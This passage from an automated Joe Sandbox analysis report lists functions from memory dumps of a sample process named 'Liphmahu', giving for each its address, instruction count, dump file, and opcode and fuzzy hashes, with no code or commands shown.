Opcode ID: 224b16ba64a24b452ef99eeabfd7ef810ca6ca77e3eb21a1876113b4aed061b5
Instruction ID: 3ca93527abc14f956670a74ee9bfc7483be5276ea078d3ff7998164ff9ced1c4
Opcode Fuzzy Hash: 224b16ba64a24b452ef99eeabfd7ef810ca6ca77e3eb21a1876113b4aed061b5
Instruction Fuzzy Hash: 30F02462F0E2D14FE72263785C20335BFA2EBC6210F1800DBD1828F3A6DA56D842C751

Function 06C609FB Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2216506456.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76de5b8efd806bc4d1e77b6245dc7249d378d1259f4da4bdc361ce3f7d235717
Instruction ID: d31fd03d330c09bcf104c9413201b795462158dc5a302ceb9733c290a5214d9a
Opcode Fuzzy Hash: 76de5b8efd806bc4d1e77b6245dc7249d378d1259f4da4bdc361ce3f7d235717
Instruction Fuzzy Hash: 8301F374A051188FDBA0DF98D8446E9B7B1FB49315F1080E5D91DF7240EB305E86CF11

Function 05D4DF90 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a38d9e23f62f0dfa296954b7c07263676b8b2ef22e4594d31e92b6f1028b2893
Instruction ID: 516e7f4dedfe24e503d0ce1d746ecf8abab1be9392ec868b56e0dbbb064cd774
Opcode Fuzzy Hash: a38d9e23f62f0dfa296954b7c07263676b8b2ef22e4594d31e92b6f1028b2893
Instruction Fuzzy Hash: C9F0E931F442515FE71896189810B2BF7EAEBC8710F14442AE6069B354CF76EC41CBD0

Function 05D4EB52 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6ecce62730d542a8a140aea7fc4a772e64015eedcf6def0837c2d5158eb0406
Instruction ID: fabc80c081e936bb1da6dc43088d97276c4e7856954e2233fd5a0e38643b5ef3
Opcode Fuzzy Hash: a6ecce62730d542a8a140aea7fc4a772e64015eedcf6def0837c2d5158eb0406
Instruction Fuzzy Hash: F6F0907A3047419FC7058F69D894D9A7BA9BF8A62130545ABF515CB361CB30D8048BA0

Function 008BD76C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2191934058.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8bd000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b8f9ae2a66119ce73faff04936f397d0cd542ade5bd730503ce295f22925d3d
Instruction ID: d6fda3efa9008f9170fdceaeb778542d87d2098fbf4eba53d4dec0f6195b0f79
Opcode Fuzzy Hash: 6b8f9ae2a66119ce73faff04936f397d0cd542ade5bd730503ce295f22925d3d
Instruction Fuzzy Hash: 1FF06D71408344AEEB208A1AD8C4BA2FFA8FB51724F18C55AED485A286D6799C44CAB1

Function 05D6B590 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adad329edceab9cb9a68ba0424641099a65a20878d16d94fbd2370e9f8686bb9
Instruction ID: f55269962d6c715569c77994e5927bb94c94c49a662dcce0b512ebed5440ef27
Opcode Fuzzy Hash: adad329edceab9cb9a68ba0424641099a65a20878d16d94fbd2370e9f8686bb9
Instruction Fuzzy Hash: 59F02736E102189BCB018B78E8115EAFBF8EF4C221B0480B7ED48E7300E6329906C7A0

Function 06C615D6 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2216506456.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a870f19c4133cd170ccc94bb09ea6e150e65acee47d6499edb0859aa679cc6e9
Instruction ID: 78b582543c9b35450b6fa6789e8c1b38732a3c36ce5c26133cc4b437d5918ee6
Opcode Fuzzy Hash: a870f19c4133cd170ccc94bb09ea6e150e65acee47d6499edb0859aa679cc6e9
Instruction Fuzzy Hash: 6611A878A056188FDB60EF98D8949D9BBF2FB49704F1041D9E409E7344E7309E95CF51

Function 06C66D77 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2216506456.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93642291ed732f1388eb1497e67d811f6badc238b452820c0c5d847b97c8d67f
Instruction ID: 799dcdfb6ff6318f5db478127ab424c492b332800515264d97c3636166c38935
Opcode Fuzzy Hash: 93642291ed732f1388eb1497e67d811f6badc238b452820c0c5d847b97c8d67f
Instruction Fuzzy Hash: 5E11E574A056288FDB60EF98D884A9EBBF1FB58305F1040DAA809F7344DA709E80CF11

Function 05D6E000 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd5ec3f9a3c3b54890ad801037e8bedbad8469a6e35e67119394ec33d99d4136
Instruction ID: 41dc95277f1c9c48fc690e7d99bd8e689b1e15b7efdb0ccd812ebea7b2ba0e3a
Opcode Fuzzy Hash: fd5ec3f9a3c3b54890ad801037e8bedbad8469a6e35e67119394ec33d99d4136
Instruction Fuzzy Hash: 99F0A030A1914C9FDB20DEA8A81523DBB98EB46305F1406EAEC0EC7781DD33AC658392

Function 05D6DB68 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fb52297dc8214d80f211a113fad0a05c4e450ca20f96da93dc439b9655c93ea
Instruction ID: e84d7e95c472f3af856b730f965503fc02866d5502eacc5cd098ac443d026f0d
Opcode Fuzzy Hash: 7fb52297dc8214d80f211a113fad0a05c4e450ca20f96da93dc439b9655c93ea
Instruction Fuzzy Hash: A5F037307443158FDB257678B81576673ABEB81112F94447BE5059B394DE72E802C761

Function 05D6DB57 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f47de5a1fed5bfe18937030a4a4eda36ef7e96717cf76c386346db6b7a7bae26
Instruction ID: 57333d7d0fb6ae821a932fd86e5df26d8fc313b0f21bb037bbff7b702c05eeba
Opcode Fuzzy Hash: f47de5a1fed5bfe18937030a4a4eda36ef7e96717cf76c386346db6b7a7bae26
Instruction Fuzzy Hash: 4DF0EC303043468FDB257638E81676973B7EB41252F98407BE4018B784DF72E803C764

Function 05D602CA Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1dcc2da1a53b6de3f005f87cb019ee3f2c6241c6f0fade72a0ca1a25346ff6a
Instruction ID: 002d7e94e67a8c7019aa5138636888b278db082695e151c48c1c0e626efac6ca
Opcode Fuzzy Hash: c1dcc2da1a53b6de3f005f87cb019ee3f2c6241c6f0fade72a0ca1a25346ff6a
Instruction Fuzzy Hash: A4F0E231909304AFCB0ACB68D45D6DDBFBAEF41220F048097E006D7240EB700A85C784

Function 05D6AD18 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cf8725ad95caccebd04ec7fc0f975a23e27fb1de6b1e5eb154029b7d39bfb1b
Instruction ID: 78b2399facaad8ad5c07501b891c6dc9f2dfa087807bca6da4d22c338d0b12f8
Opcode Fuzzy Hash: 1cf8725ad95caccebd04ec7fc0f975a23e27fb1de6b1e5eb154029b7d39bfb1b
Instruction Fuzzy Hash: EEF05E35310300DFC304DB19D854D2AB7AAEFC8721B10406AF9068B770CA71EC42CB90

Function 05D67170 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ded1843910e41ccd6aed66d3eb35753d363218ca36b57c39931995f73fdd8c72
Instruction ID: 4864809f330fae87c32de6faed1b6726c61303a661868d89192a0d776e7b8dc2
Opcode Fuzzy Hash: ded1843910e41ccd6aed66d3eb35753d363218ca36b57c39931995f73fdd8c72
Instruction Fuzzy Hash: C9E0D83230B22257DB20182DAC86F6AD6A5EB95AA5F64443FFC46C7300D515CC0753A0

Function 05D4B160 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e508ce220922186b3a7ab8bb02db847bc35b02d2bf7c820e91a01c0c7958ac83
Instruction ID: c2e18d2eb043bdc8c5875873510d82029f44f250c102abe4134b14b1df30b793
Opcode Fuzzy Hash: e508ce220922186b3a7ab8bb02db847bc35b02d2bf7c820e91a01c0c7958ac83
Instruction Fuzzy Hash: 3C019274A04618CFDB54DF58D88479DBBF2FB99711F5081A6A509BB304D7709E81CF01

Function 05D4BD91 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28a00203b0fe00efe0e5e9f060ab30aa73876746aaaf554afbd46c764a61781a
Instruction ID: d96b0f453524efc9ad89ffa3a55685d52c42c4476cd65f918ed0aaba1e9d794c
Opcode Fuzzy Hash: 28a00203b0fe00efe0e5e9f060ab30aa73876746aaaf554afbd46c764a61781a
Instruction Fuzzy Hash: 23F05E70E09214AFCB45DFA8D9406ECBFB5EB49200F0080EAE849D7342D7358A05CF51

Function 05D671C1 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29649a7d5dc636e314222fc5e5c556594443cc96ac9d62d877a42af8e0db218b
Instruction ID: 99ab85bf8ad02b2e218130becaa1af670a0911cb8ca785fd755bde826b4157fb
Opcode Fuzzy Hash: 29649a7d5dc636e314222fc5e5c556594443cc96ac9d62d877a42af8e0db218b
Instruction Fuzzy Hash: D5E065322402059FCB10961EEC85A4BFFAADBC0324B14C936B11987725CF74DD4ACB90

Function 06C61591 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2216506456.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05017f3cd8f41dd8c255601e101eeebd9aaee20c8b6c519f0bb4c55ada824aac
Instruction ID: 8b57ffc244dad44eb26cabde915bc321334a89507d845b706d3eff95f21447b9
Opcode Fuzzy Hash: 05017f3cd8f41dd8c255601e101eeebd9aaee20c8b6c519f0bb4c55ada824aac
Instruction Fuzzy Hash: C00128759056A98FCB51EF28D8949C9BBB2FF49344F0040DAE448EB20AD7344AA9CF55

Function 05D4CE28 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d597715c6f0e4ae5c55dcd387411521b3d6a7b37dc2a46a6883ef265dabe4a25
Instruction ID: e34ebbe9246a896c37e1575087f2c466ed054641384325afc76b48ee1878e16c
Opcode Fuzzy Hash: d597715c6f0e4ae5c55dcd387411521b3d6a7b37dc2a46a6883ef265dabe4a25
Instruction Fuzzy Hash: 0CF05874D0A208EFCB41DFA8C9405ADBBF5EB49200F10C1AAE849A3361D7359E06DF91

Function 05D68839 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a20eaa609595d090f0e88878f74a8acb26e35ce31cd06caa751b7e8c92c6e4fc
Instruction ID: d5de37f73f0d21ea26e45d0c48baf48364a3f9de51fb6f3ff460193540863a86
Opcode Fuzzy Hash: a20eaa609595d090f0e88878f74a8acb26e35ce31cd06caa751b7e8c92c6e4fc
Instruction Fuzzy Hash: 50E06831B143124FD700D52CE8827527BD2CB94200B48417BE801CB308DA50D90BD380

Function 05D4B720 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee30a936899b09763de062ad4bd6e4141076e33494706daf00aef1202ad0d0ca
Instruction ID: ee8b7cc1189abd8f6690b0e18fc8f5407bb4c06c4f41c33404a604508c9f0149
Opcode Fuzzy Hash: ee30a936899b09763de062ad4bd6e4141076e33494706daf00aef1202ad0d0ca
Instruction Fuzzy Hash: FCE0E5351092808FCB41DB78D8805A97FB6DB56220B1442CBE4A49B292C6315A43CB51

Function 05D4CC79 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e310b50f0f9a415bdc4f557913d57309e619f5b96d53fd30d82930dca571184d
Instruction ID: 4e6a5464bb5ea2d6b16b89bc117a212e7f60e075c433fe7968af240faf790af7
Opcode Fuzzy Hash: e310b50f0f9a415bdc4f557913d57309e619f5b96d53fd30d82930dca571184d
Instruction Fuzzy Hash: BFF0E53490E248EFCB01DFA4D9049A9BF75AB02300F10C0AAE884A7351D6325E05DB52

Function 05D4B3FA Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f69cfc056bacb337f5b981e9011452a86678d70390c5361e8121b005f18a5f13
Instruction ID: 73d59303e9f6bda5e0e880d7e96102335902ef1bb0b9b71ae31ce8b94d555a3e
Opcode Fuzzy Hash: f69cfc056bacb337f5b981e9011452a86678d70390c5361e8121b005f18a5f13
Instruction Fuzzy Hash: 9A011430A05208DFEB10EF98D488BDD7BB2FB09310F9000AAE109AB341CB309D85CF00

Function 05D602D8 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71453b317417f4cb3dfbd381facda4be51e52da1de56f4c01949803e055d153d
Instruction ID: b56fce4e96c1e3f542b524724b49656ebb1f9d23c9b0eaab0e3750d32457dbc1
Opcode Fuzzy Hash: 71453b317417f4cb3dfbd381facda4be51e52da1de56f4c01949803e055d153d
Instruction Fuzzy Hash: 15F06D31A08318AFCB09CBA8D45C6DDBFBAEB84321F04C09AE00A97340DF701A85CB84

Function 05D4AFE0 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59922373cac53f2dcaf89785efa2eb59ecacc20a3b466d1004a946c3d5af0426
Instruction ID: 3d204da86df323a6cf9d3d60898d54d07f2a2f7fc4dd52e243ef7610c63ec0e1
Opcode Fuzzy Hash: 59922373cac53f2dcaf89785efa2eb59ecacc20a3b466d1004a946c3d5af0426
Instruction Fuzzy Hash: 8AF0EC34944118DFDB54EF68E485BAD7BF2FB05311F5080AAE449A7741DB319E84CF41

Function 05D4AF65 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a5f5222a777dcbc51c6e86b2073f6ccf755a2c7cd013f5efc226b4c34869ed5
Instruction ID: 1ed7d3842488766b36a2835ec7c5279e941e8fb03d21153929d3beb82000e907
Opcode Fuzzy Hash: 0a5f5222a777dcbc51c6e86b2073f6ccf755a2c7cd013f5efc226b4c34869ed5
Instruction Fuzzy Hash: 3FF0C474A45118DFDB64EF58D984BADBBB2EB44301F5040AAEA09AB341DB309E85CF05

Function 05D4AEEA Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee98064bf985277d145d8fedf5672e5afd0bd132a6813367620e1f221199bd05
Instruction ID: 4059e50de700b772d58794b2602b2b19fcaa04fb088ab31234993986444d3330
Opcode Fuzzy Hash: ee98064bf985277d145d8fedf5672e5afd0bd132a6813367620e1f221199bd05
Instruction Fuzzy Hash: 20F0C434A54518DFDB64EF58D8847AC7BF2FB45315F9100AAE009AB742D734AE85CF41

Function 05D4ABE1 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83a9253d30cec0c114c8f0b455290a69203f01b6d9e6fdf35f096f301a893acc
Instruction ID: 7f498388fb877a0a76b34dc3ed4250354a8731ce6191a9f1e2cf7e40c276729e
Opcode Fuzzy Hash: 83a9253d30cec0c114c8f0b455290a69203f01b6d9e6fdf35f096f301a893acc
Instruction Fuzzy Hash: C0F0B274A44608DFDB54EF98D884B9CBBB2EB49301F9080AAE549BB341CB309D85CF15

Function 05D4B254 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d3e33fe0b86cdaeef29c49c3569f1df1c1aab3e326a65884fadfc4690c6d298
Instruction ID: 78a08f32727bcbb7bfa7413c364b310e7e93b67604d9b5ee6c09d848ee02753e
Opcode Fuzzy Hash: 4d3e33fe0b86cdaeef29c49c3569f1df1c1aab3e326a65884fadfc4690c6d298
Instruction Fuzzy Hash: ACF0C974944518DFEB10EF58D884B9DBBB2FB04301F508496E549B7340D7319D85CF11

Function 05D61E20 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 208c6178b6821c83ed88c268a1ed1d84ac47872267e46f4f90cc6d16de3a51d2
Instruction ID: 06fcfbda8ee03b876ed216fb2a3725f085b7f30dad945603a8d5324a3627f222
Opcode Fuzzy Hash: 208c6178b6821c83ed88c268a1ed1d84ac47872267e46f4f90cc6d16de3a51d2
Instruction Fuzzy Hash: D4E0D832344341DFCF1067A09804BA1739B9F01611F5400AFE5095F282C562E403C760

Function 05D671D0 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08ff1065224ee988393a842aeb61e1f4a66861c8b5ef92724b4015f0aade1c92
Instruction ID: 4df766c3da5aa14bd4853bd70f9585c97d3d303c26cbbf808de3f23d99cc5e06
Opcode Fuzzy Hash: 08ff1065224ee988393a842aeb61e1f4a66861c8b5ef92724b4015f0aade1c92
Instruction Fuzzy Hash: BBE012312403059FC7109B1EE88584BFF9EEEC0364710C93AB11A87325DF70ED89C690

Function 06C63BAC Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2216506456.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0663cb8dd4e4f27e3f718853f49952974357deb75c15e7cbb86ebdeb6edc6a08
Instruction ID: bc7abcdc13ee1cc19383e5d947a1f7f2a3fdfae38a7b2f3d5c73a6fbfd18a3c0
Opcode Fuzzy Hash: 0663cb8dd4e4f27e3f718853f49952974357deb75c15e7cbb86ebdeb6edc6a08
Instruction Fuzzy Hash: B2F01D3460011A8FD794DF98C894A99B7B2FB49304F0085D5E51AFB344DB70AE84CF61

Function 05D42400 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96f5a6cf6d48eae45bc8998a2f2718f7a2765e4c481cc7e57a7a3b9f4aabab76
Instruction ID: 49269bae5207821d2133883eed504690e7ba56a406660eadc950034e2e20717a
Opcode Fuzzy Hash: 96f5a6cf6d48eae45bc8998a2f2718f7a2765e4c481cc7e57a7a3b9f4aabab76
Instruction Fuzzy Hash: 4EF03074D05208EFC740DF95E9446ACBBB5FB48310F10C0AAEC4593350D7355A56EF51

Function 05D41F28 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db404643d7ee8f9da25f09fe0da4649ceac010ad30ac2ba89daf2e53bfe3cebf
Instruction ID: b85bb29d3b2724f3d7c40860a8d3ce284013a8ac7ec6a67f0a817bf5bf42282e
Opcode Fuzzy Hash: db404643d7ee8f9da25f09fe0da4649ceac010ad30ac2ba89daf2e53bfe3cebf
Instruction Fuzzy Hash: 1AF08C71E0C248AFCB01CBD4D8005ACBFB5EB49300F00C0EBE88453282D6359A46DF41

Function 05D40330 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30e2fff723873973c2996d30d0d105d938a97f0a3fa20ee9c8a49e29c9104903
Instruction ID: de4f5bdbf9bf90a7533d59c9265b83683f69b7dca54cfef84c82048ccbed49b5
Opcode Fuzzy Hash: 30e2fff723873973c2996d30d0d105d938a97f0a3fa20ee9c8a49e29c9104903
Instruction Fuzzy Hash: CCE0683044A248DFC781FBB49C049DE3FB5CF02200F4018EBD14083161ED744A15DBA7

Function 06970468 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2216163397.0000000006970000.00000040.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6970000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89b301455f95f768e4ea5402279986d7c4aa832d8700f9fbad1973a03e7d981a
Instruction ID: f4bceea33967fd18dd4648dc795eb0071db0148a292e27ad343b0b124982e4df
Opcode Fuzzy Hash: 89b301455f95f768e4ea5402279986d7c4aa832d8700f9fbad1973a03e7d981a
Instruction Fuzzy Hash: 47E04F78904208EFC744DF94E985AACBFB9FB59305F20E0A9D84857351DB315E46DF80

Function 06C7BE40 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2216506456.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72618039de0a9e3fb4285cef786ccafdca4cde9612973a497a989a3cf2d0adae
Instruction ID: 7e05c6281ecd216acb17c92cb13f6baa0df96ab87acf459b18b1c54c9c9545a7
Opcode Fuzzy Hash: 72618039de0a9e3fb4285cef786ccafdca4cde9612973a497a989a3cf2d0adae
Instruction Fuzzy Hash: 45E0C274E04208EFCB84DFA9D944AADBBF4EB48310F10C0AAA858A3351D6359E52DF81

Function 06C7D788 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2216506456.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72618039de0a9e3fb4285cef786ccafdca4cde9612973a497a989a3cf2d0adae
